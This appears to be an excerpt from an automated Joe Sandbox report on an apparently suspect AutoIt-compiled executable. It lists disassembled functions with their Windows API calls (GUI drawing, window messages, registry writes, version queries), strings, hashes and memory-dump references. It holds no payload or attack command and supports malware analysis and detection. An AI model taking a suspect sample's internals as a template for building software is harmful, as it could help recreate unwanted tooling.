                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: BuffCharUpper
                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                            • API String ID: 3964851224-45149045
                                            • Opcode ID: e97580d74c37c3b6289880f0d254bbb6e620dacc1cddee88a27a99cd8a459e93
                                            • Instruction ID: f0732c611a05f1c8f098f9ac0bc7eabee886e499c797582f47a5f13dd6600f26
                                            • Opcode Fuzzy Hash: e97580d74c37c3b6289880f0d254bbb6e620dacc1cddee88a27a99cd8a459e93
                                            • Instruction Fuzzy Hash: A3C175302042868BCA04EF58C5519AE7795FF94344F054969F986D7393EF20ED5ACB86
                                            Function 0086D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSysColor.USER32(00000012), ref: 0086D5AE
                                            • SetTextColor.GDI32(?,?), ref: 0086D5B2
                                            • GetSysColorBrush.USER32(0000000F), ref: 0086D5C8
                                            • GetSysColor.USER32(0000000F), ref: 0086D5D3
                                            • CreateSolidBrush.GDI32(?), ref: 0086D5D8
                                            • GetSysColor.USER32(00000011), ref: 0086D5F0
                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0086D5FE
                                            • SelectObject.GDI32(?,00000000), ref: 0086D60F
                                            • SetBkColor.GDI32(?,00000000), ref: 0086D618
                                            • SelectObject.GDI32(?,?), ref: 0086D625
                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0086D644
                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0086D65B
                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0086D670
                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0086D698
                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0086D6BF
                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 0086D6DD
                                            • DrawFocusRect.USER32(?,?), ref: 0086D6E8
                                            • GetSysColor.USER32(00000011), ref: 0086D6F6
                                            • SetTextColor.GDI32(?,00000000), ref: 0086D6FE
                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0086D712
                                            • SelectObject.GDI32(?,0086D2A5), ref: 0086D729
                                            • DeleteObject.GDI32(?), ref: 0086D734
                                            • SelectObject.GDI32(?,?), ref: 0086D73A
                                            • DeleteObject.GDI32(?), ref: 0086D73F
                                            • SetTextColor.GDI32(?,?), ref: 0086D745
                                            • SetBkColor.GDI32(?,?), ref: 0086D74F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                            • String ID:
                                            • API String ID: 1996641542-0
                                            • Opcode ID: 1ae7ca9a6d7dd30fb66aaacd490d93f0b6e6b1a67467f949ededab35697781c8
                                            • Instruction ID: 82d548c146868cfdb72329b53c233897ad70ad0837522eac0ea589065f4ceda2
                                            • Opcode Fuzzy Hash: 1ae7ca9a6d7dd30fb66aaacd490d93f0b6e6b1a67467f949ededab35697781c8
                                            • Instruction Fuzzy Hash: FF512B76900208AFDF10AFA8DC48EAEBB79FF08324F114515F915AB2E1D7759A409F90
                                            Function 0086B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0086B7B0
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0086B7C1
                                            • CharNextW.USER32(0000014E), ref: 0086B7F0
                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0086B831
                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0086B847
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0086B858
                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0086B875
                                            • SetWindowTextW.USER32(?,0000014E), ref: 0086B8C7
                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0086B8DD
                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 0086B90E
                                            • _memset.LIBCMT ref: 0086B933
                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0086B97C
                                            • _memset.LIBCMT ref: 0086B9DB
                                            • SendMessageW.USER32 ref: 0086BA05
                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 0086BA5D
                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 0086BB0A
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0086BB2C
                                            • GetMenuItemInfoW.USER32(?), ref: 0086BB76
                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0086BBA3
                                            • DrawMenuBar.USER32(?), ref: 0086BBB2
                                            • SetWindowTextW.USER32(?,0000014E), ref: 0086BBDA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                            • String ID: 0
                                            • API String ID: 1073566785-4108050209
                                            • Opcode ID: 54e91b476623a3f687c439e75f242003d45ead066a08f9a59579a684b6cc5d13
                                            • Instruction ID: e45f4cf48cdfa4dc0bd289fcd40cb9f703e27744c385b5c40ba21f5fe8a8f157
                                            • Opcode Fuzzy Hash: 54e91b476623a3f687c439e75f242003d45ead066a08f9a59579a684b6cc5d13
                                            • Instruction Fuzzy Hash: 17E16CB1900218ABDF20DF65CC84EEE7B78FF05718F118156F959EA291DB708A81CF61
                                            Function 0086764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCursorPos.USER32(?), ref: 0086778A
                                            • GetDesktopWindow.USER32 ref: 0086779F
                                            • GetWindowRect.USER32(00000000), ref: 008677A6
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00867808
                                            • DestroyWindow.USER32(?), ref: 00867834
                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0086785D
                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0086787B
                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 008678A1
                                            • SendMessageW.USER32(?,00000421,?,?), ref: 008678B6
                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 008678C9
                                            • IsWindowVisible.USER32(?), ref: 008678E9
                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00867904
                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00867918
                                            • GetWindowRect.USER32(?,?), ref: 00867930
                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00867956
                                            • GetMonitorInfoW.USER32 ref: 00867970
                                            • CopyRect.USER32(?,?), ref: 00867987
                                            • SendMessageW.USER32(?,00000412,00000000), ref: 008679F2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                            • String ID: ($0$tooltips_class32
                                            • API String ID: 698492251-4156429822
                                            • Opcode ID: 629ed497611a8bdaa7a1dc1ea3639c2a0d9f753f0f45ce07f1bb1faabafe108c
                                            • Instruction ID: d0887a548c62260f764f8adaf8ab162f1b72fe2ca4ac36782fc922985679723c
                                            • Opcode Fuzzy Hash: 629ed497611a8bdaa7a1dc1ea3639c2a0d9f753f0f45ce07f1bb1faabafe108c
                                            • Instruction Fuzzy Hash: 97B17A71608301AFDB44DF68C989B6ABBE5FF88314F00891DF599DB291DB74E804CB96
                                            Function 00846CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00846CFB
                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00846D21
                                            • _wcscpy.LIBCMT ref: 00846D4F
                                            • _wcscmp.LIBCMT ref: 00846D5A
                                            • _wcscat.LIBCMT ref: 00846D70
                                            • _wcsstr.LIBCMT ref: 00846D7B
                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00846D97
                                            • _wcscat.LIBCMT ref: 00846DE0
                                            • _wcscat.LIBCMT ref: 00846DE7
                                            • _wcsncpy.LIBCMT ref: 00846E12
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                            • API String ID: 699586101-1459072770
                                            • Opcode ID: faef54e1a5ec6caeaa1d03a0944156e9d74cd612bbf61bb7bb69a16ad9cecdca
                                            • Instruction ID: 0bbd69c079b929a67b86c9d885244b314f34773169b6792e71502d2a4874fd2f
                                            • Opcode Fuzzy Hash: faef54e1a5ec6caeaa1d03a0944156e9d74cd612bbf61bb7bb69a16ad9cecdca
                                            • Instruction Fuzzy Hash: CB41E471A04214BBEB00BB68DC47EBF77BCFF51714F140066F901E2282FA759A5096A7
                                            Function 0081A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0081A939
                                            • GetSystemMetrics.USER32(00000007), ref: 0081A941
                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0081A96C
                                            • GetSystemMetrics.USER32(00000008), ref: 0081A974
                                            • GetSystemMetrics.USER32(00000004), ref: 0081A999
                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0081A9B6
                                            • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0081A9C6
                                            • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0081A9F9
                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0081AA0D
                                            • GetClientRect.USER32(00000000,000000FF), ref: 0081AA2B
                                            • GetStockObject.GDI32(00000011), ref: 0081AA47
                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0081AA52
                                              • Part of subcall function 0081B63C: GetCursorPos.USER32(000000FF), ref: 0081B64F
                                              • Part of subcall function 0081B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0081B66C
                                              • Part of subcall function 0081B63C: GetAsyncKeyState.USER32(00000001), ref: 0081B691
                                              • Part of subcall function 0081B63C: GetAsyncKeyState.USER32(00000002), ref: 0081B69F
                                            • SetTimer.USER32(00000000,00000000,00000028,0081AB87), ref: 0081AA79
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                            • String ID: AutoIt v3 GUI
                                            • API String ID: 1458621304-248962490
                                            • Opcode ID: 88d44ae691db68f8da83bcc84d16bf8c026c1c6b4b0e0278c8e2adcd5119b8b4
                                            • Instruction ID: 03d6b1fc3e6766fce4b7958d83dc02e0cf4823e7284797d5f9d7793269cded47
                                            • Opcode Fuzzy Hash: 88d44ae691db68f8da83bcc84d16bf8c026c1c6b4b0e0278c8e2adcd5119b8b4
                                            • Instruction Fuzzy Hash: DDB13A71A0121A9FDB18DFA8DC89FEA7BB8FF18314F114229FA15E6290D774D890CB51
                                            Function 00802EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$Foreground
                                            • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                            • API String ID: 62970417-1919597938
                                            • Opcode ID: f63e30a38d4ab8d7c6f1c2539c3a8bba7cbd3070368aacddc0d8a556cff19bf1
                                            • Instruction ID: a631ef78b8dbf40020ad07391e4315f6631a78934fa35905edbd0146dce195bb
                                            • Opcode Fuzzy Hash: f63e30a38d4ab8d7c6f1c2539c3a8bba7cbd3070368aacddc0d8a556cff19bf1
                                            • Instruction Fuzzy Hash: 5BD1C430508747DBCB04EF58C88199AFBA4FF54344F108A19F45AD76A2DB70E99ACBD2
                                            Function 00863639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00863735
                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0089DC00,00000000,?,00000000,?,?), ref: 008637A3
                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 008637EB
                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00863874
                                            • RegCloseKey.ADVAPI32(?), ref: 00863B94
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00863BA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Close$ConnectCreateRegistryValue
                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                            • API String ID: 536824911-966354055
                                            • Opcode ID: 1485fffd8071fab5ea51c8181ccf457c8bc14a7c5370dfbe958a5fe2344f6dd7
                                            • Instruction ID: 7e8af120e1816371183be3d6461c5b4b9e78de82d06ecc5ef679e52d50fb6213
                                            • Opcode Fuzzy Hash: 1485fffd8071fab5ea51c8181ccf457c8bc14a7c5370dfbe958a5fe2344f6dd7
                                            • Instruction Fuzzy Hash: AE024A756046119FCB14EF18C851A2AB7E5FF89720F05855DF98ADB3A2CB30ED41CB82
                                            Function 00866BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CharUpperBuffW.USER32(?,?), ref: 00866C56
                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00866D16
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: BuffCharMessageSendUpper
                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                            • API String ID: 3974292440-719923060
                                            • Opcode ID: ef9c8afb6c2362d0c543201b92d7dac2ddaccb61379000c4b3781a16e446b514
                                            • Instruction ID: 3fe884ddc652363c89479aea91d842af66310f08508ef4fd97d8a6dbe8d07b91
                                            • Opcode Fuzzy Hash: ef9c8afb6c2362d0c543201b92d7dac2ddaccb61379000c4b3781a16e446b514
                                            • Instruction Fuzzy Hash: 64A183302143869FCB14EF18C851AAAB7A5FF44314F114968B956DB3D2EF31EC19CB82
                                            Function 0083CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetClassNameW.USER32(?,?,00000100), ref: 0083CF91
                                            • __swprintf.LIBCMT ref: 0083D032
                                            • _wcscmp.LIBCMT ref: 0083D045
                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0083D09A
                                            • _wcscmp.LIBCMT ref: 0083D0D6
                                            • GetClassNameW.USER32(?,?,00000400), ref: 0083D10D
                                            • GetDlgCtrlID.USER32(?), ref: 0083D15F
                                            • GetWindowRect.USER32(?,?), ref: 0083D195
                                            • GetParent.USER32(?), ref: 0083D1B3
                                            • ScreenToClient.USER32(00000000), ref: 0083D1BA
                                            • GetClassNameW.USER32(?,?,00000100), ref: 0083D234
                                            • _wcscmp.LIBCMT ref: 0083D248
                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0083D26E
                                            • _wcscmp.LIBCMT ref: 0083D282
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                            • String ID: %s%u
                                            • API String ID: 3119225716-679674701
                                            • Opcode ID: a694c8c55f36e2c72470df2587007e74598bd59052fd7c45d6cecac31ee43f43
                                            • Instruction ID: b14bbe1446293c77e37600ecdcedcbdb87f7c32243272907aebed917a0c07ed0
                                            • Opcode Fuzzy Hash: a694c8c55f36e2c72470df2587007e74598bd59052fd7c45d6cecac31ee43f43
                                            • Instruction Fuzzy Hash: 8BA1CF71604706AFDB15DF64E884FAAB7A8FF94314F008619F999D3190EB30EA46CBD1
                                            Function 0083D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 0083D8EB
                                            • _wcscmp.LIBCMT ref: 0083D8FC
                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 0083D924
                                            • CharUpperBuffW.USER32(?,00000000), ref: 0083D941
                                            • _wcscmp.LIBCMT ref: 0083D95F
                                            • _wcsstr.LIBCMT ref: 0083D970
                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0083D9A8
                                            • _wcscmp.LIBCMT ref: 0083D9B8
                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 0083D9DF
                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0083DA28
                                            • _wcscmp.LIBCMT ref: 0083DA38
                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 0083DA60
                                            • GetWindowRect.USER32(00000004,?), ref: 0083DAC9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                            • String ID: @$ThumbnailClass
                                            • API String ID: 1788623398-1539354611
                                            • Opcode ID: bcb4101812a55489f79c66e2ed795477ea615d69262a90b1c2ae1e98ebb51a80
                                            • Instruction ID: ee74f4e4d65da10fef52fdefc6a14ba7d2cc6909ca27389f737081dd7d7f302a
                                            • Opcode Fuzzy Hash: bcb4101812a55489f79c66e2ed795477ea615d69262a90b1c2ae1e98ebb51a80
                                            • Instruction Fuzzy Hash: E2818E710083099BDB05DF14E985BAA7BE8FF84714F14846AFD89DA096EB30ED45CBE1
                                            Function 0083D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __wcsnicmp
                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                            • API String ID: 1038674560-1810252412
                                            • Opcode ID: cfbb257a35e6118a47a94a6a77253148fd4b74d3de57898b3fda6995f6f74f9f
                                            • Instruction ID: 81fd3371e7ab24e7de49a5fd0a8f9e2d19d058bc2d2daf7bf7cb0cb6bc8a127a
                                            • Opcode Fuzzy Hash: cfbb257a35e6118a47a94a6a77253148fd4b74d3de57898b3fda6995f6f74f9f
                                            • Instruction Fuzzy Hash: 01318E31A44309E6DB24FB58ED53EEEB364FF60724F200529F461F12D1EF65AA1486A2
                                            Function 0083EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadIconW.USER32(00000063), ref: 0083EAB0
                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0083EAC2
                                            • SetWindowTextW.USER32(?,?), ref: 0083EAD9
                                            • GetDlgItem.USER32(?,000003EA), ref: 0083EAEE
                                            • SetWindowTextW.USER32(00000000,?), ref: 0083EAF4
                                            • GetDlgItem.USER32(?,000003E9), ref: 0083EB04
                                            • SetWindowTextW.USER32(00000000,?), ref: 0083EB0A
                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0083EB2B
                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0083EB45
                                            • GetWindowRect.USER32(?,?), ref: 0083EB4E
                                            • SetWindowTextW.USER32(?,?), ref: 0083EBB9
                                            • GetDesktopWindow.USER32 ref: 0083EBBF
                                            • GetWindowRect.USER32(00000000), ref: 0083EBC6
                                            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0083EC12
                                            • GetClientRect.USER32(?,?), ref: 0083EC1F
                                            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0083EC44
